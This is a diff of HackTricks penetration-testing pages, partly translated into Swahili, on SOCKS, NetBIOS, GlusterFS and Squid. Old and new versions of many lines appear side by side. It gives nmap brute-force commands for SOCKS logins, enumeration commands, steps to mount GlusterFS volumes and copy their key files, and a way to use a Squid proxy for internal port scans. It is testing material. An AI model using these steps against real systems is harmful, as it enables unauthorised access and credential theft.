Kwa kufuata hatua hizi, unaweza kufanikiwa kuvunja nywila na kupata ufikiaji usioidhinishwa kwenye mfumo unaolindwa. Hata hivyo, ni muhimu kutambua kuwa matumizi ya msukumo wa nguvu yanaweza kuwa kinyume cha sheria na yanaweza kusababisha madhara makubwa. Kwa hivyo, ni muhimu kuzingatia sheria na kufanya msukumo wa nguvu tu kwa idhini ya mmiliki wa mfumo unaolindwa.
#### Matumizi ya Msingi
```bash
nmap --script socks-brute -p 1080 <ip>
```
#### Matumizi ya juu
##### Socks Proxy
A Socks proxy is a protocol that allows a client to establish a connection through a firewall by using a proxy server. It can be used to bypass network restrictions and access resources that are otherwise blocked.
###### Socks4
Socks4 is an older version of the Socks protocol that only supports TCP connections. It does not support authentication, so anyone can use it to connect to a Socks server.
###### Socks5
Socks5 is the newer version of the Socks protocol and supports both TCP and UDP connections. It also supports authentication, allowing for more secure connections. Socks5 can be used with various authentication methods, including username/password, GSSAPI, and SSL/TLS certificates.
##### Socks Proxy Chains
Socks proxy chains involve using multiple Socks proxies in a series to route traffic through different servers. This can help to further obfuscate the source of the traffic and make it more difficult to trace.
##### Socks Proxy Forwarding
Socks proxy forwarding involves forwarding traffic from a local Socks proxy to a remote Socks proxy. This can be useful in scenarios where the remote Socks proxy has access to resources that are not directly accessible from the local network.
##### Socks Proxy Tunnels
Socks proxy tunnels involve encapsulating traffic within a Socks proxy connection. This can be useful for bypassing network restrictions or for creating encrypted tunnels for secure communication.
##### Socks Proxy Wrappers
Socks proxy wrappers are tools that can be used to wrap existing applications with Socks proxy functionality. This allows the application to use a Socks proxy without requiring any modifications to the application itself.
##### Socks Proxy Tools
There are various tools available for working with Socks proxies, including proxychains, ProxyCap, and SocksCap. These tools can be used to configure and manage Socks proxies, as well as to route traffic through them.
```bash
nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 <ip>
```
#### Mbinu za Kudukua Huduma za Mtandao
##### Kudukua Socks
Socks ni itifaki ya mtandao inayotumiwa kwa kuunganisha watumiaji na seva ya proxy. Inaruhusu watumiaji kufanya uhusiano wa mtandao kupitia seva ya proxy, ambayo inaweza kusaidia kuficha anwani ya IP ya mtumiaji halisi.
Kudukua Socks kunaweza kufanyika kwa njia kadhaa, ikiwa ni pamoja na:
1. Kuchunguza Socks Proxy: Unaweza kutumia zana kama Nmap au ProxyChains kuchunguza seva za Socks Proxy zinazopatikana kwenye mtandao.
2. Kudukua Socks Proxy: Mara tu unapopata seva ya Socks Proxy, unaweza kujaribu kudukua akaunti zilizopo kwenye seva hiyo kwa kutumia mbinu kama vile kujaribu nywila za kawaida, kudukua maelezo ya kuingia, au kutumia mbinu za kudukua zilizojulikana.
3. Kudukua Mawasiliano ya Socks: Unaweza kudukua mawasiliano ya Socks kwa kusikiliza trafiki ya mtandao inayopita kati ya mteja na seva ya proxy. Hii inaweza kufanyika kwa kutumia zana kama Wireshark au mitambo ya kusikiliza trafiki.
Kwa kudukua Socks, unaweza kupata ufikiaji usioidhinishwa kwa mifumo ya mtandao, kufikia rasilimali zilizozuiliwa, au kuficha anwani yako ya IP halisi. Ni muhimu kwa wataalamu wa kudukua kuelewa mbinu hizi ili kuboresha usalama wa mifumo ya mtandao.
#### Matokeo
```
PORT STATE SERVICE
1080/tcp open socks
@ -98,19 +47,15 @@ PORT STATE SERVICE
| Statistics
|_ Performed 1921 guesses in 6 seconds, average tps: 320
```
## Kuchimba na Kusogeza Bandari
## Tunneling and Port Forwarding
### Matumizi ya msingi ya proxychains
### Msingi wa matumizi ya proxychains
Sanidi proxy chains kutumia socks proxy
Weka proxy chains kutumia socks proxy
```
nano /etc/proxychains4.conf
```
Edit the bottom and add your proxy
**Swahili Translation:**
Badilisha sehemu ya chini na ongeza proksi yako
Edit chini na ongeza proxy yako
```
socks5 10.10.10.10 1080
```
@ -118,18 +63,19 @@ Na uthibitisho
```
socks5 10.10.10.10 1080 username password
```
#### Taarifa zaidi: [Tunneling na Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
#### More info: [Tunneling and Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

64
network-services-pentesting/137-138-139-pentesting-netbios.md
View file

@ -1,37 +1,38 @@
# 137,138,139 - Kupima Usalama wa NetBios
# 137,138,139 - Pentesting NetBios
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Huduma ya Jina la NetBios
## NetBios Name Service
**Huduma ya Jina la NetBIOS** inacheza jukumu muhimu, ikijumuisha huduma mbalimbali kama **usajili na ufumbuzi wa majina**, **usambazaji wa datagram**, na **huduma za kikao**, kwa kutumia bandari maalum kwa kila huduma.
**NetBIOS Name Service** ina jukumu muhimu, ikihusisha huduma mbalimbali kama vile **usajili wa majina na ufumbuzi**, **usambazaji wa datagram**, na **huduma za kikao**, ikitumia bandari maalum kwa kila huduma.
[Kutoka kwa Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):
[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):
* Huduma ya jina kwa usajili na ufumbuzi wa majina (bandari: 137/udp na 137/tcp).
* Huduma ya usambazaji wa datagram kwa mawasiliano yasiyo na uhusiano (bandari: 138/udp).
* Huduma ya kikao kwa mawasiliano yenye uhusiano (bandari: 139/tcp).
* Huduma ya jina kwa usajili wa majina na ufumbuzi (bandari: 137/udp na 137/tcp).
* Huduma ya usambazaji wa datagram kwa mawasiliano yasiyo na muunganisho (bandari: 138/udp).
* Huduma ya kikao kwa mawasiliano yenye muunganisho (bandari: 139/tcp).
### Huduma ya Jina
### Name Service
Ili kifaa kiweze kushiriki katika mtandao wa NetBIOS, lazima kiwe na jina la kipekee. Hii inafanikishwa kupitia **mchakato wa matangazo** ambapo pakiti ya "Utafutaji wa Jina" inatumwa. Ikiwa hakuna pingamizi zinazopokelewa, jina linachukuliwa kuwa lipo. Vinginevyo, **seva ya Huduma ya Jina** inaweza kuulizwa moja kwa moja ili kuthibitisha upatikanaji wa jina au kufumbua jina kuwa anwani ya IP. Zana kama `nmblookup`, `nbtscan`, na `nmap` hutumiwa kwa ajili ya kuhesabu huduma za NetBIOS, kufichua majina ya seva na anwani za MAC.
Ili kifaa kiweze kushiriki katika mtandao wa NetBIOS, lazima kiwe na jina la kipekee. Hii inapatikana kupitia **mchakato wa matangazo** ambapo pakiti ya "Name Query" inatumwa. Ikiwa hakuna pingamizi zinazopokelewa, jina linaonekana kuwa linapatikana. Vinginevyo, **seva ya Huduma ya Jina** inaweza kuulizwa moja kwa moja ili kuangalia upatikanaji wa jina au kutatua jina kuwa anwani ya IP. Zana kama `nmblookup`, `nbtscan`, na `nmap` zinatumika kwa kuorodhesha huduma za NetBIOS, zikifunua majina ya seva na anwani za MAC.
```bash
PORT STATE SERVICE VERSION
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
```
Kwa kuchunguza huduma ya NetBIOS, unaweza kupata majina ambayo seva inatumia na anwani ya MAC ya seva.
Kuhesabu huduma ya NetBIOS unaweza kupata majina ambayo seva inatumia na anwani ya MAC ya seva.
```bash
nmblookup -A <IP>
nbtscan <IP>/30
@ -39,23 +40,23 @@ sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
```
### Huduma ya Usambazaji wa Datagram
Datagram za NetBIOS zinaruhusu mawasiliano bila kuunganisha kupitia UDP, zikisaidia ujumbe wa moja kwa moja au utangazaji kwa majina yote ya mtandao. Huduma hii hutumia bandari **138/udp**.
NetBIOS datagrams huruhusu mawasiliano yasiyo na muunganiko kupitia UDP, ikisaidia ujumbe wa moja kwa moja au matangazo kwa majina yote ya mtandao. Huduma hii inatumia bandari **138/udp**.
```bash
PORT STATE SERVICE VERSION
138/udp open|filtered netbios-dgm
```
### Huduma ya Kikao
Kwa mwingiliano unaotegemea uhusiano, **Huduma ya Kikao** inawezesha mazungumzo kati ya vifaa viwili, ikifaidika na uhusiano wa **TCP** kupitia bandari **139/tcp**. Kikao kinaanza na pakiti ya "Ombi la Kikao" na kinaweza kuanzishwa kulingana na jibu. Huduma hii inasaidia ujumbe mkubwa, ugunduzi wa makosa, na urejeshaji, na TCP inashughulikia udhibiti wa mtiririko na kutuma upya pakiti.
Kwa mwingiliano unaotegemea muunganisho, **Huduma ya Kikao** inarahisisha mazungumzo kati ya vifaa viwili, ikitumia **TCP** kupitia bandari **139/tcp**. Kikao kinaanza na pakiti ya "Ombi la Kikao" na kinaweza kuanzishwa kulingana na jibu. Huduma hii inasaidia ujumbe wakubwa, kugundua makosa, na urejeleaji, huku TCP ikishughulikia udhibiti wa mtiririko na urejeleaji wa pakiti.
Uhamishaji wa data ndani ya kikao unahusisha pakiti za **Ujumbe wa Kikao**, na kikao kinakamilishwa kwa kufunga uhusiano wa TCP.
Uhamasishaji wa data ndani ya kikao unahusisha **Pakiti za Ujumbe wa Kikao**, ambapo vikao vinamalizika kwa kufunga muunganisho wa TCP.
Huduma hizi ni sehemu muhimu ya utendaji wa **NetBIOS**, kuruhusu mawasiliano yenye ufanisi na ushirikiano wa rasilimali kwenye mtandao. Kwa habari zaidi juu ya itifaki za TCP na IP, tafadhali rejea kurasa zao za [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) na [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol).
Huduma hizi ni muhimu kwa utendaji wa **NetBIOS**, zikihakikisha mawasiliano bora na ushirikiano wa rasilimali katika mtandao. Kwa maelezo zaidi kuhusu protokali za TCP na IP, rejelea kurasa zao za [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) na [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol).
```bash
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
**Soma ukurasa ufuatao ili kujifunza jinsi ya kuchanganua huduma hii:**
**Soma ukurasa ujao kujifunza jinsi ya kuhesabu huduma hii:**
{% content-ref url="137-138-139-pentesting-netbios.md" %}
[137-138-139-pentesting-netbios.md](137-138-139-pentesting-netbios.md)
@ -84,16 +85,17 @@ Name: Find Names
Description: Three scans to find the names of the server
Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP}
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

52
network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
View file

@ -1,61 +1,47 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**GlusterFS** ni **mfumo wa faili uliosambazwa** ambao unachanganya uhifadhi kutoka kwenye seva nyingi kuwa **mfumo mmoja uliojumuishwa**. Inaruhusu **ukubwa usio na kikomo**, maana unaweza kuongeza au kuondoa seva za uhifadhi bila kuvuruga mfumo mzima wa faili. Hii inahakikisha **upatikanaji wa juu** na **uvumilivu wa hitilafu** kwa data yako. Kwa kutumia GlusterFS, unaweza kufikia faili zako kama vile zimehifadhiwa kwenye eneo lako, bila kujali miundombinu ya seva iliyo chini. Inatoa suluhisho lenye nguvu na linaweza kubadilika kwa usimamizi wa kiasi kikubwa cha data kwenye seva nyingi.
**GlusterFS** ni **mfumo wa faili ulio sambazwa** unaounganisha uhifadhi kutoka kwa seva nyingi katika **mfumo mmoja**. Inaruhusu **upanuzi wa kiholela**, ikimaanisha unaweza kuongeza au kuondoa seva za uhifadhi kwa urahisi bila kuathiri mfumo wa faili kwa ujumla. Hii inahakikisha **upatikanaji** wa juu na **uvumilivu wa makosa** kwa data yako. Pamoja na GlusterFS, unaweza kufikia faili zako kana kwamba zimehifadhiwa kwa ndani, bila kujali miundombinu ya seva inayotumika. Inatoa suluhisho lenye nguvu na linaloweza kubadilika kwa usimamizi wa kiasi kikubwa cha data katika seva nyingi.
**Bandari za chaguo-msingi**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (na zaidi)\
Kwa bandari 49152, bandari zilizoongezeka kwa 1 zinahitaji kuwa wazi ili kutumia bricks zaidi. _Awali bandari 24009 ilikuwa inatumika badala ya 49152._
**Bandari za kawaida**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (kuanzia)\
Kwa bandari 49152, bandari zinazoongezeka kwa 1 zinahitaji kuwa wazi ili kutumia zaidi ya bricks. _Awali bandari 24009 ilitumika badala ya 49152._
```
PORT STATE SERVICE
24007/tcp open rpcbind
49152/tcp open ssl/unknown
```
## Uchambuzi
## Enumeration
Ili kuingiliana na mfumo huu wa faili, unahitaji kusakinisha [**Mteja wa GlusterFS**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Ili kuingiliana na mfumo huu wa faili unahitaji kufunga [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Kutaja na kufunga voli zilizopo, unaweza kutumia:
Ili kuorodhesha na kuunganisha kiasi kilichopo unaweza kutumia:
```bash
sudo gluster --remote-host=10.10.11.131 volume list
# This will return the name of the volumes
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
```
Ikiwa unapokea **kosa wakati wa kufunga mfumo wa faili**, unaweza kuangalia magogo katika `/var/log/glusterfs/`
Ikiwa unapokea **kosa la kujaribu kuunganisha mfumo wa faili**, unaweza kuangalia kumbukumbu katika `/var/log/glusterfs/`
**Makosa yanayotaja vyeti** yanaweza kusuluhishwa kwa kuiba faili (ikiwa una ufikiaji kwenye mfumo):
**Makosa yanayohusisha vyeti** yanaweza kutatuliwa kwa kuiba faili (ikiwa una ufikiaji wa mfumo):
* /etc/ssl/glusterfs.ca
* /etc/ssl/glusterfs.key
* /etc/ssl/glusterfs.ca.pem
Na kuzihifadhi kwenye kifaa chako katika saraka ya `/etc/ssl` au `/usr/lib/ssl` (ikiwa saraka tofauti inatumika, angalia mistari kama "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" katika magogo).
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Na kuyahifadhi katika mashine yako `/etc/ssl` au `/usr/lib/ssl` directory (ikiwa directory tofauti inatumika angalia mistari inayofanana na: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" katika kumbukumbu) .

60
network-services-pentesting/3128-pentesting-squid.md
View file

@ -1,62 +1,64 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)):
From [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)):
> **Squid** ni kache na mbele ya mtandao wa proksi wa HTTP. Ina matumizi mbalimbali, ikiwa ni pamoja na kuharakisha seva ya wavuti kwa kuhifadhi ombi zilizorudiwa, kuhifadhi wavuti, DNS na utafutaji mwingine wa mtandao wa kompyuta kwa kikundi cha watu wanaoshiriki rasilimali za mtandao, na kusaidia usalama kwa kufuta trafiki. Ingawa hutumiwa hasa kwa HTTP na FTP, Squid ina msaada mdogo kwa itifaki kadhaa zingine ikiwa ni pamoja na Internet Gopher, SSL, TLS na HTTPS. Squid haisaidii itifaki ya SOCKS, tofauti na Privoxy, ambayo Squid inaweza kutumika ili kutoa msaada wa SOCKS.
> **Squid** ni proxy ya wavuti ya HTTP inayohifadhi na kupeleka. Ina matumizi mbalimbali, ikiwa ni pamoja na kuongeza kasi ya seva ya wavuti kwa kuhifadhi maombi yanayorudiwa, kuhifadhi wavuti, DNS na utafutaji mwingine wa mtandao wa kompyuta kwa kundi la watu wanaoshiriki rasilimali za mtandao, na kusaidia usalama kwa kuchuja trafiki. Ingawa inatumika hasa kwa HTTP na FTP, Squid ina msaada mdogo kwa protokali nyingine kadhaa ikiwa ni pamoja na Internet Gopher, SSL, TLS na HTTPS. Squid haisaidii protokali ya SOCKS, tofauti na Privoxy, ambayo Squid inaweza kutumika ili kutoa msaada wa SOCKS.
**Bandari ya msingi:** 3128
**Default port:** 3128
```
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.11
```
# Uchambuzi
# Enumeration
## Mtandao wa Proksi
## Web Proxy
Unaweza kujaribu kuweka huduma hii uliyoigundua kama proksi kwenye kivinjari chako. Hata hivyo, ikiwa imeboreshwa na uthibitishaji wa HTTP utaulizwa majina ya watumiaji na nywila.
Unaweza kujaribu kuweka huduma hii iliyogunduliwa kama proxy kwenye kivinjari chako. Hata hivyo, ikiwa imewekwa na uthibitisho wa HTTP, utaombwa kwa majina ya watumiaji na nywila.
```bash
# Try to proxify curl
curl --proxy http://10.10.11.131:3128 http://10.10.11.131
```
## Nmap imefanyiwa proxi
## Nmap proxified
Unaweza pia jaribu kutumia proxi kufanya **uchunguzi wa bandari za ndani kwa kutumia nmap**.\
Sanidi proxychains kutumia proxi ya squid kwa kuongeza mstari ufuatao mwishoni mwa faili ya proxichains.conf: `http 10.10.10.10 3128`
Kwa proxi zinazohitaji uwakiki, ongeza siri kwenye usanidi kwa kuingiza jina la mtumiaji na nywila mwishoni: `http 10.10.10.10 3128 jina_la_mtumiaji nywila`.
You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\
Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128`\
Kwa proxies zinazohitaji uthibitisho, ongeza taarifa za kuingia kwenye usanidi kwa kujumuisha jina la mtumiaji na nenosiri mwishoni: `http 10.10.10.10 3128 username passw0rd`.
Kisha endesha nmap kwa kutumia proxychains kufanya **uchunguzi wa mwenyeji kutoka kwa eneo la ndani**: `proxychains nmap -sT -n -p- localhost`
Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost`
## SPOSE Scanner
